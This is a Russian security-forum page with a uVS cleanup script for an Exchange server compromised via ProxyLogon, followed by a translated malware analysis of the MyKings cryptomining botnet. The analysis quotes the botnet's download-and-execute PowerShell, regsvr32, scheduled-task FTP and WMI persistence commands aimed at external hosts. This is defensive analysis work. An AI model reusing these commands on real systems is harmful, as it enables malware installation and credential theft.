santy (Все сообщения пользователя) - Форум технической поддержки ESET NOD32

[ Закрыто] Заражение корпоративной сети вирусом-майнером через уязвимость ProxyLogon на сервере Exchange 2013, ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 и CVE-2021-27065), Trojan.Win32.Generic, Trojan.Multi.GenAutorunReg.c, Trojan.Multi.GenAutorunWMI.a, PowerShellMulDrop.129 + PowerShellDownLoader.1452, HEUR:Trojan.Multi.GenAutorunSvc.ksws

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 04.09.2021 15:48:47

выполняем скрипт в uVS:
- скопировать содержимое кода в буфер обмена;
- стартуем uVS(start.exe), далее выбираем: текущий пользователь, меню - скрипты - выполнить скрипт из буфера обмена;
- закрываем все браузеры перед выполнением скрипта;

Код
;uVS v4.11.8 [http://dsrt.dyndns.org:8888] ;Target OS: NTv6.3 v400c OFFSGNSAVE zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_BROWSERS.CM1GY-YR.DLL zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_GLOBAL.ASAX.9ROHC7PQ.DLL zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\RPC\296C8D2F\5A4276D8\APP_GLOBAL.ASAX.B43PI4NY.DLL zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\AUTODISCOVER\1E0EBF5E\81BBFD0C\APP_GLOBAL.ASAX.CQHP4HAL.DLL zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\EWS\82CED47D\9F9837FE\APP_GLOBAL.ASAX.F82CQ-3M.DLL zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\OWA_CALENDAR\50586ABB\43FE3563\APP_GLOBAL.ASAX.FJON4ZRX.DLL zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\MAPI\236CA80D\613D0742\APP_GLOBAL.ASAX.GFOSMOYG.DLL zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\AUTODISCOVER\B455E468\CBAAC37D\APP_GLOBAL.ASAX.LOVEIRWB.DLL zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\OWA\8E05B027\E164D61B\APP_GLOBAL.ASAX.N3CT8VNU.DLL zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\OWA\F1907565\9FA11D9F\APP_GLOBAL.ASAX.P7BTXYGD.DLL zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\OAB\5A665F22\C3DD660B\APP_GLOBAL.ASAX.QXTXGCN5.DLL zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\EWS\9BF2358A\E86A63DA\APP_GLOBAL.ASAX.RGDBHA8I.DLL zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\MAPI_EMSMDB\FF130E68\58BD4667\APP_GLOBAL.ASAX.T_-RLTDU.DLL zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\POWERSHELL\788CBAD3\5ED4F687\APP_GLOBAL.ASAX.VOPJ5BFR.DLL zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\1CD810A3\710C31B6\APP_GLOBAL.ASAX.ZIGCDRV_.DLL zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_THEME_DEFAULT._PA_PVFA.DLL zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_0EXSSJHG.DLL zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_2X1TGTE0.DLL zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_2ZYUFYVK.DLL zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_BZJN21B2.DLL zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_DPLFNAEX.DLL zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_FHHKYG34.DLL zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_FRZ2LSJQ.DLL zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_HHL3EFGE.DLL zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_LUOS5NMH.DLL zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_MT1YTSHN.DLL zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\OWA\8E05B027\E164D61B\APP_WEB_O5BJKYBG.DLL zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_OCV4TGXS.DLL zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_QDEJ0KXZ.DLL zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_WKYXHA1V.DLL czoo QUIT

Код


;uVS v4.11.8 [http://dsrt.dyndns.org:8888]
;Target OS: NTv6.3
v400c
OFFSGNSAVE
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_BROWSERS.CM1GY-YR.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_GLOBAL.ASAX.9ROHC7PQ.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\RPC\296C8D2F\5A4276D8\APP_GLOBAL.ASAX.B43PI4NY.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\AUTODISCOVER\1E0EBF5E\81BBFD0C\APP_GLOBAL.ASAX.CQHP4HAL.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\EWS\82CED47D\9F9837FE\APP_GLOBAL.ASAX.F82CQ-3M.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\OWA_CALENDAR\50586ABB\43FE3563\APP_GLOBAL.ASAX.FJON4ZRX.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\MAPI\236CA80D\613D0742\APP_GLOBAL.ASAX.GFOSMOYG.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\AUTODISCOVER\B455E468\CBAAC37D\APP_GLOBAL.ASAX.LOVEIRWB.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\OWA\8E05B027\E164D61B\APP_GLOBAL.ASAX.N3CT8VNU.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\OWA\F1907565\9FA11D9F\APP_GLOBAL.ASAX.P7BTXYGD.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\OAB\5A665F22\C3DD660B\APP_GLOBAL.ASAX.QXTXGCN5.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\EWS\9BF2358A\E86A63DA\APP_GLOBAL.ASAX.RGDBHA8I.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\MAPI_EMSMDB\FF130E68\58BD4667\APP_GLOBAL.ASAX.T_-RLTDU.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\POWERSHELL\788CBAD3\5ED4F687\APP_GLOBAL.ASAX.VOPJ5BFR.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\1CD810A3\710C31B6\APP_GLOBAL.ASAX.ZIGCDRV_.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_THEME_DEFAULT._PA_PVFA.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_0EXSSJHG.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_2X1TGTE0.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_2ZYUFYVK.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_BZJN21B2.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_DPLFNAEX.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_FHHKYG34.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_FRZ2LSJQ.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_HHL3EFGE.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_LUOS5NMH.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_MT1YTSHN.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\OWA\8E05B027\E164D61B\APP_WEB_O5BJKYBG.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_OCV4TGXS.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_QDEJ0KXZ.DLL
zoo %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V4.0.30319\TEMPORARY ASP.NET FILES\ECP\67F1AD38\E5546D0A\APP_WEB_WKYXHA1V.DLL
czoo
QUIT

без перезагрузки
архив из каталога uVS (по формату: ZOO_гггг-мм-дд_чч-мм-сс.rar/7z) отправить в [email protected]
------------

[ Как создать образ автозапуска? ]

Перейти

Подозрительное падение скорости системы, Последнее время почему то такое ощущение что моя система начала тормозить

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 27.08.2021 15:56:07

добавьте образ автозапуска системы

[ Как создать образ автозапуска? ]

Перейти

поговорить о uVS, Carberp, планете Земля

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 26.08.2021 17:08:27

горячая тема, возможно Mykings рапространился в сети предприятия.
https://forum.kasperskyclub.ru/topic/84069-zarazhenie-korporativnoj-seti-zlovred-trojanmultigenautorunwmis-ili-a-on-zhe-heurtrojanmultigenautorunsvcksws-on-zhe-powershellmuldrop129powershelldownloader1452/

[ Как создать образ автозапуска? ]

Перейти

MyKings: медленный, но неустанный рост ботнета

Сообщений: 17977

Баллов: 28762

Регистрация: 16.03.2010

Размещено 21.08.2021 13:32:22

SophosLab ранее опубликовал детальный отчет о работе ботнета Mykings, который возможно и стоит за многими атаками на системы с использованием EternalBlue NSA exploit, инструментария WMI для обновления и экплуатации систем с целью майнинга криптовалют, буткита для закрепления устойчивой работы бэкдора и майнеров и др.

MyKings: медленный, но неустанный рост ботнета

Ботнет MyKings имеет широкую ряд автоматизированных методов взлома серверы - все для установки майнера криптовалюты.

Вступление

Ботнет MyKings / DarkCloud / Smominru (который мы будем называть MyKings) был активен в течение двух лет. Хотя отдельные модули были описаны в нескольких публикациях, в прошлом эта статья не фокусировалась на глубоком анализе отдельных используемых вредоносных компонентов. во время активности. Здесь мы смотрим на взаимодействие между различными элементами инструментов, используемыми злоумышленников MyKings и их роли в процессе заражения, чтобы получить полную картину работа ботнета. Ботнет обычно доставляет криптомайнеры и трояны удаленного доступа (RAT). Недавно злоумышленники, стоящие за MyKings, добавили функциональность буткита, чтобы избежать обнаружения и установить постоянство это трудно удалить или смягчить. Самая ранняя активность MyKings датируется 2016 годом, и с тех пор она активна, но мы обнаружили некоторые пересекаются в образцах и серверной инфраструктуре с более ранней кампанией.

Основные выводы этого исследования заключаются в следующем:

* Ботнет распространяется путем атаки на слабые комбинации имени пользователя и пароля в MySQL, MSSQL, telnet, ssh, IPC, WMI, RDP, а также дополнительно использует EternalBlue для бокового движения.

* Во время начальных процессов заражения ботнет защищает компьютер; удаляет процессы, файлы и настройки, принадлежащие семействам вредоносных программ, управляемые другими угрозами актеры; и закрывает коммуникационные порты, которые могут быть использованы для повторного заражения компьютера.

Злоумышленники, стоящие за этим ботнетом, предпочитают использовать открытый исходный код или другое доступное ПО и обладают достаточными навыками, чтобы вносить изменения и улучшения в исходный код.

Основными целями ботнета являются страны Азии, но мы можем найти инфекции повсюду.

В число наиболее инфицированных стран входили:

* Китай * Тайвань * Россия * Бразилия * США * Индия * Япония

Процесс заражения

Компоненты ботнета очень взаимосвязаны, и существует множество возможных путей или способв заражений.

ok.exe - установщик буткита Ботнет MyKings начал интенсивно использовать компоненты буткита в начале 2019 года. Однако первые версии установщика буткита датируются июнем 2018 г.

Наиболее распространенный вариант попадал в зараженные системы с именами файлов ok.exe или max.exe.

Установщики буткитов обычно защищены с помощью VMProtect, что делает более сложным точный анализ.

Это характерно для ботнета: есть несколько компонентов, каждый из которых они делают очень похожую процедуру самообновления. Таким образом, даже если большинство компонентов ботнет удаляется с компьютера, остальные имеют возможность восстановить его до полной силы.

Он выполняет поиск в списке запущенных процессов и завершает те, которые связаны с продуктами безопасности, используя жестко запрограммированный список имен.

c3.bat - это компонент, который завершает процесс заражения. Это относительно большой командный файл; В размер варьируется, но обычно он составляет от 3 000 до 20 000 байт. Он запускает несколько десятков процессов по мере выполнения своей задачи - загрузки обновлений, установки. компоненты, устанавливая стойкость и очищая все следы, которые были созданы во время начальный процесс заражения. Это наиболее часто используемый компонент кампаний, было несколько десятков его вариантов. обнаружено, что они отличались в незначительных деталях, таких как список уничтожения или имена учетных записей пользователей. Обычно он устанавливается из самораспаковывающихся архивов RAR, содержащих два файла, n.vbs и c3.bat.

Криптомайнинг - ресурсоемкий процесс, на компьютере есть место только для одного. MyKings пытается убедиться, что ему не нужно делить драгоценный процессор с другими майнерами - даже если они дружеские. Многие имена процессов используются более старыми версиями ботнета MyKings, поэтому этот механизм также может служить частью процесса обновления. Обратите внимание, что более старые версии майнеров, вероятно, использовали более старые (и уже заблокированы) идентификаторы кошельков, которые бесполезны. Список убитых процессов со временем менялся

Некоторые имена используются чаще, другие могут быть связаны с конкретными угрозами, например:

Цитата
doc001.exe (майнер XMRig) docv8.exe (майнер XMRig) wodCmdTerm.exe (майнер XMRig) NsCpuCNMiner64.exe (CNMiner) tlscntr.exe (майнер XMRig) ctfmonc.exe (майнер XMRig) wuauser.exe (майнер XMRig) mscsuscr.exe (майнер XMRig) Pviunc.exe (майнер XMRig) Bllianc.exe (майнер XMRig) dether.exe (майнер XMRig)

Правила межсетевого экрана

Пакетный файл изменяет правила брандмауэра. Цель состоит в том, чтобы закрыть порты, которые использовались для первоначального инфекции или могут быть использованы для последующих инфекций. Таким образом ботнет защищает себя от враждебных захват, обезопасив зараженный компьютер. Он создает новые правила брандмауэра, которые блокируют доступ к зараженному компьютеру на портах 135, 137, 138, 139 и 445 (относится к таким службам, как RPC, NetBIOS и Active Directory). Это закрывает возможность повторное заражение с помощью эксплойта RDP или EternalBlue.

Обновление компонентов

Скрипт скачивает с сайтов обновлений ряд различных скриптов, например:

Цитата
powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('hxxp://wmi.1217bye[.]host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('hxxp://173.208.139[.]170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('hxxp://35.182.171[.]137/s.jpg')\|\|regsvr32 /u /s /i:hxxp://wmi.1217bye[.]host/1.txt scrobj.dll®svr32 /u /s /i:hxxp://173.208.139[.]170/2.txt scrobj.dll®svr32 /u /s /i:hxxp://35.182.171[.]137/3.txt scrobj.dll"

Цитата

powershell.exe IEX (New-Object
system.Net.WebClient).DownloadString('hxxp://wmi.1217bye[.]host/S.ps1')&powershell.exe IEX
(New-Object
system.Net.WebClient).DownloadString('hxxp://173.208.139[.]170/s.txt')&powershell.exe IEX
(New-Object system.Net.WebClient).DownloadString('hxxp://35.182.171[.]137/s.jpg')||regsvr32 /u
/s /i:hxxp://wmi.1217bye[.]host/1.txt scrobj.dll®svr32 /u /s
/i:hxxp://173.208.139[.]170/2.txt scrobj.dll®svr32 /u /s /i:hxxp://35.182.171[.]137/3.txt
scrobj.dll"

Роль загружаемых файлов следующая:
• s.ps1: завершает все процессы svchost.exe и conhost.exe, которые не выполняются из системный каталог и выполняет c: \ windows \ temp \ conhost.exe
• s.txt: скрипт сбора информации
• s.jpg: убивает процессы, связанные с майнером, и определяет правила брандмауэра.
• 1.txt: загружает компоненты PE (обычно установщик буткита и дроппер c3.bat).
• 2.txt: список URL-адресов для компонентов.

Загружается несколько различных компонентов, и используются несколько методов сохранения, чтобы убедиться, что буткит переживает перезагрузку на компьютере

Устойчивость

Пакетный сценарий использует несколько различных методов для достижения устойчивости и выживаемости после загрузки системы

Буткит

Компонент буткита - это первый из методов сохранения. Поскольку в IPL перезаписывается вредоносный код, он будет выполняться при каждой перезагрузке, а также загружает и запускает компоненты ботнета.

Ключи автозапуска в реестре

В дополнение к этому пакетный файл создает ключ автозапуска реестра, который использует regsvr32.exe для извлечения и выполнения обновления, в данном случае v.sct, который представляет собой простой скриптлет, загружающий компоненты Win32.

Цитата
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:hxxp://js.1226bye[.]xyz:280/v.sct scrobj.dll" /f reg add "HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:hxxp://js.1226bye[.]xyz:280/v.sct scrobj.dll" /f

Задачи по расписанию

Некоторые компоненты прописаны в отдельную задачу. Названия задач обычно:
ok, Mysa, Mysa1, Mysa2 и Mysa3.

Запланированные задачи выполняются при запуске системы с помощью командной строки, которая подключается к ftp-серверу. и скачивает обновление, в случае задачи Mysa исполняемый файл будет сохранен как a.exe

Цитата
schtasks /create /tn "Mysa" /tr "cmd /c echo open ftp.1226bye[.]xyz>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe" /ru "system" /sc onstart /F schtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.1226bye[.]xyz>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p" /ru "system" /sc onstart /F schtasks /create /tn "Mysa3" /tr "cmd /c echo open ftp.1226bye[.]xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe" /ru "system" /sc onstart /F

Цитата

schtasks /create /tn "Mysa" /tr "cmd /c echo open ftp.1226bye[.]xyz>s&echo
test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo
bye>>s&ftp -s:s&c:\windows\update.exe" /ru "system" /sc onstart /F

schtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.1226bye[.]xyz>p&echo
test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp
-s:p" /ru "system" /sc onstart /F

schtasks /create /tn "Mysa3" /tr "cmd /c echo open ftp.1226bye[.]xyz>ps&echo
test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo
bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe" /ru "system" /sc onstart /F

Запланированные задачи обычно загружают дополнительные компоненты через ftp-соединение, в данном конкретном случае. бэкдор Forshare и майнер.

Затем другой набор задач запускает загруженный файл ok.dat, который является файлом DLL Windows, поэтому сценарий выполняет экспорт ServiceMain с параметром aaaa. Этот компонент является бэкдором PCShare.

Цитата
schtasks / create / tn "Mysa1" / tr "rundll32.exe c: \ windows \ debug \ item.dat, ServiceMain aaaa "/ ru" system "/ sc onstart / F schtasks / create / tn "ok" / tr "rundll32.exe c: \ windows \ debug \ ok.dat, ServiceMain aaaa "/ ru" система "/ sc onstart / F

сценарии WMI

Третий метод использует фильтры WMI для установления исполнения.

c3.bat сначала удаляет следующие сценарии событий WMI, созданные более ранней версией ботнета:

Цитата
• fuckyoumm2_filter • fuckyoumm2_consumer • fuckayoumm3 • fuckayoumm4 • Windows Events Consumer • Windows Events Consumer4 • Windows Events Filter

Затем регистрирует новый фильтр с именем fuckyoumm4, который выполняется каждые 3 часа (10800 секунд).

Цитата
wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="fuckyoumm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="fuckyoumm4", CommandLineTemplate="cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiA EMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0 AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB 0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJA BfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAR gBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.ex e IEX (New-Object system.Net.WebClient).DownloadString('hxxp://wmi.1217bye[.]host/S.ps1')&powersh ell.exe IEX (New-Object system.Net.WebClient).DownloadString('hxxp://173.208.139[.]170/s.txt')&powershe ll.exe IEX (New-Object system.Net.WebClient).DownloadString('hxxp://35.182.171[.]137/s.jpg')\|\|regsvr32 /u /s /i:hxxp://wmi.1217bye[.]host/1.txt scrobj.dll®svr32 /u /s /i:hxxp://173.208.139[.]170/2.txt scrobj.dll®svr32 /u /s /i:hxxp://35.182.171[.]137/3.txt scrobj.dll"&wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="fuckyoumm3"", Consumer="CommandLineEventConsumer.Name="fuckyoumm4""

Цитата

wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="fuckyoumm3",
EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM
__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA
'Win32_PerfFormattedData_PerfOS_System'"&wmic /NAMESPACE:"\\root\subscription"
PATH CommandLineEventConsumer CREATE Name="fuckyoumm4",
CommandLineTemplate="cmd /c powershell.exe -nop -enc
"JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiA
EMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0
AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB
0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJA
BfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAR
gBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.ex
e IEX (New-Object
system.Net.WebClient).DownloadString('hxxp://wmi.1217bye[.]host/S.ps1')&powersh
ell.exe IEX (New-Object
system.Net.WebClient).DownloadString('hxxp://173.208.139[.]170/s.txt')&powershe
ll.exe IEX (New-Object
system.Net.WebClient).DownloadString('hxxp://35.182.171[.]137/s.jpg')||regsvr32
/u /s /i:hxxp://wmi.1217bye[.]host/1.txt scrobj.dll®svr32 /u /s
/i:hxxp://173.208.139[.]170/2.txt scrobj.dll®svr32 /u /s
/i:hxxp://35.182.171[.]137/3.txt scrobj.dll"&wmic
/NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE
Filter="__EventFilter.Name="fuckyoumm3"",
Consumer="CommandLineEventConsumer.Name="fuckyoumm4""

Это код события - зашифрованная команда PowerShell, которая загружает текстовый файл с URL-адреса.

Цитата
hxxp: //wmi.1217bye [.] host / 2.txt (URL-адрес может со временем измениться). $wc=New-Object System.Net.WebClient;$wc.DownloadString('hxxp://wmi.1217bye[.]host/2.txt').trim( ) -split '[\r\n]+'\|%{$n=$_.split('/')[-1];$wc.DownloadFile($_, $n);start $n;}

Содержимое этого файла должно содержать список URL-адресов следующего этапа, которые загружаются и выполнен. Пример содержимого файла 2.txt был следующим:

Цитата
hxxp://173.247.239[.]186/ok.exe hxxp://173.247.239[.]186/upsupx.exe hxxp://173.247.239[.]186/u.exe

Дополнительные три команды в сценарии WMI загружают еще три компонента:

Цитата
hxxp://173.208.139[.]170/s.txt hxxp://35.182.171[.]137/s.jpg hxxp://wmi.1217bye[.]host/S.ps1

Здесь s.txt - это сценарий PowerShell, который загружает файл списка уничтожения из hxxp: //139.5.177 [.] 19 / l.txt.

Этот файл содержит список имен процессов; сценарий останавливает каждый процесс в этом списке:

Цитата
lsmose.exe,C:\Windows\debug\lsmose.exe,1 lsmos.exe,C:\Windows\debug\lsmos.exe,1 lsmo.exe,C:\Windows\debug\lsmo.exe,1 csrw.exe,C:\Program Files (x86)\Common Files\csrw.exe,119 csrw.exe,C:\Program Files\Common Files\csrw.exe,1 lsmosee.exe,c:\windows\help\lsmosee.exe,1 csrs.exe,c:\csrs.exe,1

В завершение c3.bat загружает и выполняет s.txt. Это извлекает список уничтожения и останавливает процессы указанный в нем, а также дополнительно загружает и выполняет сценарий с именем up.txt. Это сценарий сбора информации, который собирает системную информацию (включая пароли, использующие Powerkatz) и загружает его на ftp-сервер 192.187.111.66, который был активным сервером сбора. на момент написания этого документа.

полный отчет здесь

